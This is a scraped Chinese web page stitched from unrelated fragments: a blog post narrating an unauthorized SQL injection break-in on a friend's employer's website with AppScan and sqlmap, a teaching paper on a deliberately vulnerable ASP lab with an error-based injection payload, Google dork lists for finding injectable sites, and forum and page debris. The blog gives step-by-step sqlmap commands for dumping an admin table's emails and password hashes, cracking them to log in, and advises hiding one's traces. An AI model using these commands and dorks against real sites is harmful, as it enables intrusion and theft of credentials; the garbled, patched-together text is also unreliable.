没有sql注入方法链接怎么入侵网站

阿里巴巴中国站和淘宝网会员帐号体系、《阿里巴巴服务条款》升级,完成登录后两边同时登录成功。
SQL注入网站入侵实例
当前文档信息
同分类热门文档
同分类最新上传
server is ok最近在研究Web安全相关的知识,特别是SQL注入类的相关知识。接触了一些与SQL注入相关的工具。周末在家闲着无聊,想把平时学的东东结合起来攻击一下身边某个小伙伴去的公司,看看能不能得逞。不试不知道,一试还真TM得逞了,内心有些小激动,特在此写博文一篇,来记录下我是如何一步步攻破这家互联网公司的。
【作案工具介绍】
(1) AppScan渗透扫描工具
Appscan是Web应用程序渗透测试舞台上使用最广泛的工具之一。它是一个桌面应用程序,它有助于专业安全人员进行Web应用程序自动化脆弱性评估。
(2) Sqlmap渗透测试工具
Sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。
【作案细节如下】
首先使用Appscan工具,对www.xxx.com互联网公司的官网进行扫描,扫描结果如下:&
在这56个安全性问题中,找到你感兴趣的链接,例如下面这条:
为何要挑出这一条呢?因为它对于SQL注入比较典型,下面普及下SQL注入常用手法。首先用如下语句,确定该网站是否存在注入点:
& 出错或显示不正常
&and 1=1 出错或显示不正常
&and 1=2 出错或显示不正常
如果有出错,说明存在注入点。
在判断完该链接存在注入点后,接下来就启动我们的渗透测试工具Sqlmap,进行下一步的注入工作,详细过程如下:
1) 再次确认目标注入点是否可用:
python sqlmap.py -u&
-u:指定注入点url
注入结果展示:
a. 参数id存在基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
b. 参数id存在基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
c. 数据库类型为:MySql 5.0.12
2) 暴库所有数据库:
一条命令即可曝出该sqlserver中所有数据库名称,命令如下:
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1
--dbs:dbs前面有两条杠,列出所有数据库。
结果显示该sqlserver中共包含3个可用的数据库。
3) 获取当前使用的数据库
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1
--current-db:当前所使用的数据库。
4) 获取当前数据库使用账户
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-user
5) 列出sqlserver所有用户
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1
6) 获取当前用户数据库账户与密码
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1
结果显示该用户可能无读取相关系统的权限。
7) 列出数据库中的表
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store
-D:指定数据库名称
--tables:列出表
结果显示共列出了69张表。
8) 列出表中字段
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin
-D:指定数据库名称
-T:指定要列出字段的表
--columns:指定列出字段
9)暴字段内容
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status"
-C :指定要暴的字段
--dump:将结果导出
如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status"
--start:指定开始的行
--stop:指定结束的行
此条命令的含义为:导出数据库xxx_store中的表mall_admin中的关于字段(ag_id,email,id,mobile,name,password,status)中的第1到第10行的数据内容。
结果如下:
通过上图,我们可以看到admin表中的用户信息了。我们将password字段通过md5解密,可以得到hash的原文密码,通过用户名和密码,我们就可以登录该网站了。
至此,我们已成功入侵到一家公司的后台,并拿到了相关的数据。不过要在这里提醒你:成功入侵只是成功了一半,另外最重要的一半是把屁股擦干净,不让别人发现你了!
本文由腾讯WeTest团队提供,更多资讯可直接戳链接查看:&&转载请注明:&&
阅读(...) 评论()论文发表、论文指导
周一至周五
9:00&22:00
利用SQL注入攻击登录网站后台实验环境搭建及使用研究
  摘要:为了在高职院校的《网络安全与防范》课程中取得较好的教学效果,必须搭建大量的实验环境供学生演练。本文总结了开展ASP+SQL Server 2000环境下利用SQL注入攻击登录网站后台的实验环境的搭建及使用研究。 中国论文网 /9/view-4495727.htm  关键词:SQL注入攻击;网络安全;实验环境   中图分类号:G718 文献标识码:A 文章编号:(9-03   SQL注入攻击是黑客最喜欢使用的攻击方式之一,其危害极大。为了在高职院校的《网络安全与防范》课程中取得较好的教学效果,必须搭建大量的实验环境供学生演练。   在之前工作经验的基础之上,笔者总结了开展ASP+SQL Server 2000环境下利用SQL注入攻击登录网站后台实验环境搭建及使用的研究,希望能对高职院校《网络安全与防范》课程中SQL注入攻击与防范的教学起到一定的促进作用。   利用SQL注入攻击登录网站后台实验环境的搭建   在之前的工作中,已经基于ASP+SQL Server 2000搭建了一个具有SQL注入漏洞的动态网站Testweb,并且演示了使用SQL注入攻击,添加目标计算机系统的管理员账户、开启远程终端连接,并且用攻击机远程登录到目标计算机等操作。   本文扩展了动态网站Testweb,使其有用于网站后台登录的页面,然后我们将展示使用SQL注入攻击获得网站后台账户、口令,并且登录进入后台的操作。   如之前的工作一样,使用VMware WorkStatition虚拟机软件安装了两台虚拟机,一台虚拟机安装的是Windows Server 2003操作系统,用于模拟被攻击的服务器,IP地址为192.168.248.132;另一台虚拟机安装的是Windows XP操作系统,用于模拟黑客使用的攻击机,IP地址为192.168.248.133。   在Windows Server 2003虚拟机上,扩展了之前搭建的使用ASP+SQL Server 2000开发的简单的动态网站Testweb。该动态网站访问名为Testweb的数据库,该数据库原来只包含一个表:tblNews。我们扩展了该数据库,使其包含另一个表:tblUser,该表用于存储登录后台的账户和密码。tblUser的具体结构如表1所示。   初始时在这个表中输入了一些测试用的数据。   该网站原来包括以下三个页面:conn.asp、news.asp、displayNews.asp。其中conn.asp用于保存与SQL Server 2000数据库服务器的连接信息;news.asp用于读取数据库中的新闻记录,显示所有新闻的标题,并且将这些标题以超级链接的形式显示。当单击某个新闻的标题后,即可以进入形如displayNews.asp?id=xxx的页面,看到新闻的具体内容(其中“xxx”表示某条新闻在tblNews表中ID字段的值)。   从新增的三个页面的具体代码可以看出,新增的页面也具有简单,易于理解、分析和掌握的优点。   同时,页面displayNews.asp有SQL注入漏洞,可以满足进行SQL注入攻击的实训需要,其具有SQL注入漏洞的具体语句为:   strSql="select * from tblNews where ID=" & newsID   该语句根据某条新闻的ID查询tblNews表的内容,可以在形如displayNews.asp?id=xxx的地址后面加入精心构造的语句,从而执行特定的SQL语句,查询信息、执行命令、进而控制服务器。   利用SQL注入攻击登录网站后台实验环境的使用   如上开发的动态网站Testweb具有SQL注入漏洞,下面我们通过破解网站后台账户、口令的入侵步骤来展示该SQL注入攻击实验环境的使用。   访问Testweb网站,判断其是否具有SQL注入漏洞。   (一)猜解含有字符串“pass”的字段名以及该字段所属表的表名   在SQL Server 2000中,当前数据库的syscolumn表中有以下两个字段:name和id。其中name是当前数据库中所有表中含有的字段的名称,id是该字段所属表的编号。通过查询syscolumns表,我们就可以得到含有字符串pass的字段名以及该字段所属表格的编号。再使用SQL Server中的object_name(id)函数就可以得到字段所属表格的名称。   在地址栏输入:http://192.168.248.132/testweb/displayNews.asp?id=1 and(select top 1 t_name%2b’|’%2bc_name from(select top 1 object_name(id)as t_name,name as c_name from syscolumns where charIndex(‘pass’,name)>0 and left(name,1)!=’@’ order by t_name)as T order by t_name desc)>0 (1)   返回的提示信息包含:将 nvarchar 值 'sysusers|password' 转换为数据类型为 int 的列时发生语法错误。从返回信息中,我们可以知道当前数据库中有一个sysusers表,该表含有password字段。   将(1)中的子查询“select top 1 object_name(id)as t_name,name…. ”中的1依次修改为2,3,……,即可得到所有含有“pass”的字段名以及该字段所属表的的表名信息。如将“select top 1 object_name(id)as t_name,name….”改成“select top 2 object_name(id)as t_name,name….”后,得到的提示信息包含:将 nvarchar 值 'tblUser|password' 转换为数据类型为 int 的列时发生语法错误。从该提示信息,可以知道当前数据库中有个tblUser表,该表有password字段。
  (1)比较复杂。首先看(1)的子查询中的:select top 1 object_name(id)as t_name,name as c_name from syscolumns where charIndex(‘pass’,name)>0 and left(name,1)!=’@’ order by t_name (2)   (2)的原理是:在syscolumns表中筛选出字段名中包含字符串“pass”,并且字段名不以字符“@”起始的记录,然后得到这些记录的字段名和该字段所属的表的表名(通过object_name(id)函数从表的id得到表的名称),再将这些结果根据表名按照升序进行排列,最后筛选出最前面的一条记录。   (1)的原理是从子查询(2)的结果中根据表名降序筛选出最前面的一条记录,并将表名和字段名用“|”连接起来,得到最终的结果,最后让其与整数0进行比较,因为类型不匹配,将导致SQL Server出错,根据出错信息,即可得到表名和字段名。其中“%2b”是字符串连接运算符“+”。   (二)得到用户表的字段数目   (三)得到用户表的所有字段名   (四)得到用户名和密码   (五)登录网站的后台   结语   与DVBBS等整站程序相比,我们搭建的实验环境具有简单、方便学生理解、分析和掌握的优点。同时,我们的实验环境设有SQL注入漏洞,能够让学生方便地演练在ASP+SQL Server 2000环境下猜解数据表的名称、猜解字段的数目、字段的名称、字段的内容、扫描网站后台等操作。这对提高学生的学习兴趣,掌握SQL注入攻击的原理和具体的实施步骤很有好处。   参考文献:   [1]肖遥.大中型网络入侵要案直击与防御[M].北京:电子工业出版社,2011.   [2]朱锡华,刘月铧,侯伟.暗战亮剑——黑客渗透与防御全程实录[M].北京:人民邮电出版社,2010.   [3]武新华,等.矛与盾——黑客攻防与脚本编程[M].北京:机械工业出版社,2010.   作者简介:   曾煌存(1979—),男,广东兴宁人,硕士,广东外语艺术职业学院信息技术系讲师,研究方向为网络安全。   (本栏责任编辑:张维佳)
转载请注明来源。原文地址:
【xzbu】郑重声明:本网站资源、信息来源于网络,完全免费共享,仅供学习和研究使用,版权和著作权归原作者所有,如有不愿意被转载的情况,请通知我们删除已转载的信息。
xzbu发布此信息目的在于传播更多信息,与本网站立场无关。xzbu不保证该信息(包括但不限于文字、数据及图表)准确性、真实性、完整性等。我做了一个网站,工信部说有SQL注入,如何查询
[问题点数:40分,结帖人cy2941873]
本版专家分:30
结帖率 92.31%
CSDN今日推荐
本版专家分:30
本版专家分:10194
本版专家分:896
本版专家分:576
本版专家分:30
本版专家分:13817
本版专家分:30
本版专家分:1595
本版专家分:576
本版专家分:399
本版专家分:451170
2017年 总版技术专家分年内排行榜第十2013年 总版技术专家分年内排行榜第八
2017年2月 总版技术专家分月排行榜第三
2018年7月 .NET技术大版内专家分月排行榜第一2018年6月 .NET技术大版内专家分月排行榜第一2018年1月 .NET技术大版内专家分月排行榜第一2017年5月 .NET技术大版内专家分月排行榜第一2017年4月 .NET技术大版内专家分月排行榜第一2017年3月 .NET技术大版内专家分月排行榜第一2017年2月 .NET技术大版内专家分月排行榜第一2016年10月 .NET技术大版内专家分月排行榜第一2016年8月 .NET技术大版内专家分月排行榜第一2016年7月 .NET技术大版内专家分月排行榜第一
2018年4月 .NET技术大版内专家分月排行榜第二2018年3月 .NET技术大版内专家分月排行榜第二2017年12月 .NET技术大版内专家分月排行榜第二2017年9月 .NET技术大版内专家分月排行榜第二2017年7月 .NET技术大版内专家分月排行榜第二2017年6月 .NET技术大版内专家分月排行榜第二2016年12月 .NET技术大版内专家分月排行榜第二2016年9月 .NET技术大版内专家分月排行榜第二2016年6月 .NET技术大版内专家分月排行榜第二2016年3月 .NET技术大版内专家分月排行榜第二2016年1月 .NET技术大版内专家分月排行榜第二2015年12月 .NET技术大版内专家分月排行榜第二2015年2月 .NET技术大版内专家分月排行榜第二2015年1月 .NET技术大版内专家分月排行榜第二2014年11月 .NET技术大版内专家分月排行榜第二2014年5月 .NET技术大版内专家分月排行榜第二2014年4月 .NET技术大版内专家分月排行榜第二2012年2月 多媒体/设计/Flash/Silverlight 开发大版内专家分月排行榜第二
本版专家分:30
本版专家分:88446
2015年2月 总版技术专家分月排行榜第一2015年1月 总版技术专家分月排行榜第一
2015年3月 总版技术专家分月排行榜第二2014年12月 总版技术专家分月排行榜第二2014年9月 总版技术专家分月排行榜第二
2015年3月 .NET技术大版内专家分月排行榜第一2015年2月 .NET技术大版内专家分月排行榜第一2015年1月 .NET技术大版内专家分月排行榜第一2014年12月 .NET技术大版内专家分月排行榜第一2014年11月 .NET技术大版内专家分月排行榜第一
2015年7月 .NET技术大版内专家分月排行榜第二2015年6月 .NET技术大版内专家分月排行榜第二2015年5月 .NET技术大版内专家分月排行榜第二2014年10月 .NET技术大版内专家分月排行榜第二2014年9月 .NET技术大版内专家分月排行榜第二2014年8月 .NET技术大版内专家分月排行榜第二
本版专家分:30
本版专家分:88446
2015年2月 总版技术专家分月排行榜第一2015年1月 总版技术专家分月排行榜第一
2015年3月 总版技术专家分月排行榜第二2014年12月 总版技术专家分月排行榜第二2014年9月 总版技术专家分月排行榜第二
2015年3月 .NET技术大版内专家分月排行榜第一2015年2月 .NET技术大版内专家分月排行榜第一2015年1月 .NET技术大版内专家分月排行榜第一2014年12月 .NET技术大版内专家分月排行榜第一2014年11月 .NET技术大版内专家分月排行榜第一
2015年7月 .NET技术大版内专家分月排行榜第二2015年6月 .NET技术大版内专家分月排行榜第二2015年5月 .NET技术大版内专家分月排行榜第二2014年10月 .NET技术大版内专家分月排行榜第二2014年9月 .NET技术大版内专家分月排行榜第二2014年8月 .NET技术大版内专家分月排行榜第二
本版专家分:88446
2015年2月 总版技术专家分月排行榜第一2015年1月 总版技术专家分月排行榜第一
2015年3月 总版技术专家分月排行榜第二2014年12月 总版技术专家分月排行榜第二2014年9月 总版技术专家分月排行榜第二
2015年3月 .NET技术大版内专家分月排行榜第一2015年2月 .NET技术大版内专家分月排行榜第一2015年1月 .NET技术大版内专家分月排行榜第一2014年12月 .NET技术大版内专家分月排行榜第一2014年11月 .NET技术大版内专家分月排行榜第一
2015年7月 .NET技术大版内专家分月排行榜第二2015年6月 .NET技术大版内专家分月排行榜第二2015年5月 .NET技术大版内专家分月排行榜第二2014年10月 .NET技术大版内专家分月排行榜第二2014年9月 .NET技术大版内专家分月排行榜第二2014年8月 .NET技术大版内专家分月排行榜第二
本版专家分:30
本版专家分:88446
2015年2月 总版技术专家分月排行榜第一2015年1月 总版技术专家分月排行榜第一
2015年3月 总版技术专家分月排行榜第二2014年12月 总版技术专家分月排行榜第二2014年9月 总版技术专家分月排行榜第二
2015年3月 .NET技术大版内专家分月排行榜第一2015年2月 .NET技术大版内专家分月排行榜第一2015年1月 .NET技术大版内专家分月排行榜第一2014年12月 .NET技术大版内专家分月排行榜第一2014年11月 .NET技术大版内专家分月排行榜第一
2015年7月 .NET技术大版内专家分月排行榜第二2015年6月 .NET技术大版内专家分月排行榜第二2015年5月 .NET技术大版内专家分月排行榜第二2014年10月 .NET技术大版内专家分月排行榜第二2014年9月 .NET技术大版内专家分月排行榜第二2014年8月 .NET技术大版内专家分月排行榜第二
本版专家分:30
本版专家分:399
本版专家分:6243
本版专家分:90
本版专家分:10194
本版专家分:399
本版专家分:30
本版专家分:29824
本版专家分:6243
本版专家分:1595
本版专家分:486
本版专家分:0
本版专家分:546
本版专家分:10
本版专家分:1500
本版专家分:10
本版专家分:13
2010年9月 PowerBuilder大版内专家分月排行榜第二
本版专家分:7334
本版专家分:53
2014年11月 C/C++大版内专家分月排行榜第二2014年10月 C/C++大版内专家分月排行榜第二2014年8月 C/C++大版内专家分月排行榜第二
本版专家分:121
本版专家分:399
本版专家分:0
本版专家分:0
本版专家分:0
本版专家分:825
本版专家分:1030
本版专家分:0
本版专家分:4508
本版专家分:399
本版专家分:0
匿名用户不能发表回复!
其他相关推荐
用于练习sql注入使用 新手必备
用于练习sql注入使用 新手必备
日 星期一 23:00好多天了,工信部备案网站一直打不开,我们这边无论是电信、联想还是移动,额的那个神,备案的网站都打不开,如何备案?据说有的地方可以打开,使用在线代理过去可以访问到,但无法登录。备案网站打不开的临时解决办法:直接用IP访问或修改hosts文件。先ping一下下面的IP,哪个快用哪个:211.94.161.5.
带SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错!
漏洞成因:
SQL注入主要存在于动态网站的web应用中,攻击者将恶意的sql语句插入到表单的输入域或网页请求的字符串中,提交给web服务器,如果应用程序没有对用户的输入进行检查和过滤,则会执行恶意的SQL语句,即SQL注入产生。
简而言之:SQL注入由于应用程序没有对用户的输入进行安全性检查和过滤造成的。
SQL注入攻击一般流程:
又到了晚上的玩耍时间,老板在工作室,就没敢看我的哈利波特第三集,但是玩还是要玩的,
今天看了一天的计算机图形学,补补我的计算机绘图基础,有点期末考一天复习完一科的赶脚
晚上刚好一个很厉害的师兄在这边,我也刚好买了自己的域名,云主机也早就运行好久了
知乎了一下,发现这两个东西组合在一起可以做出一些好玩的东西,那就是上线!!!
想想之前我之前做的小项目都是在本地的sql库
1、通过JSky对该网站进行安全扫描,得出如下可注入点:
2、选取第一个网址,在后方加入单引号,得出如下:
可以判断:
网站使用的是access数据库,通过jet引擎连接数据库。
有四位同学中的一位做了好事,不留名,表扬信来了之后,校长问这四位是谁做的好事。
A说:不是我。
B说:是C。
C说:是D。
D说:他胡说。
已知三个人说的是真话,一个人说的是假话。现在要根据这些信息,找出做了好事的人。
代码如下:
int main()
char thisman = '/0';
SQL注入取得网站路径大全 作者:佚名
来源:最爱晒晒 BLOG
发布时间: 3:22:03
发布人:黑客动画吧 减小字体 增大字体 如果网站只开了80端口,你会发现下面的方法是比较有用的 其中用的方法几乎都不是我发现的,文总包括一些注入时的个人经验和技巧 方法可以说有4种(现在已知的) 第一种方法: 这个是&中介绍的方法 利用sqlserver的xp_dirtree,好的
在不懂技术的时候,总觉的SQL注入是很牛逼的东西,如何绕过用户名和密码的验证来实现注入呢,写代码时间久了之后,慢慢了解了这个技术,其实不是什么神秘的东西,原理很简单,利用SQL语句本身的逻辑漏洞实现,当然本贴只给新手观看的,因为本人也是新手,老鸟就速度绕道吧
sql绕过用户名和密码,我只讲最简单的一种方式,让大家懂了原理就好
后台从前台获取用户名和密码,
假设账号的字段为user,密
高级搜索关键词 sql 注入大全
拿起你手中的 啊D 明小子 pangolin
inurl:asp?id=
inurl:Article_Print.asp?
inurl:EnCompHonorBig.asp?id=随便加个数字
inurl:showproduct.asp?id=随便加个数字
inurl:ManageLogin.asp
inurl:EnCompH网易云音乐
很抱歉,你要查找的网页找不到
网易公司版权所有(C)杭州乐读科技有限公司运营:
违法和不良信息举报电话:6
举报邮箱:

我要回帖

更多关于 防止sql注入的方法 的文章

 

随机推荐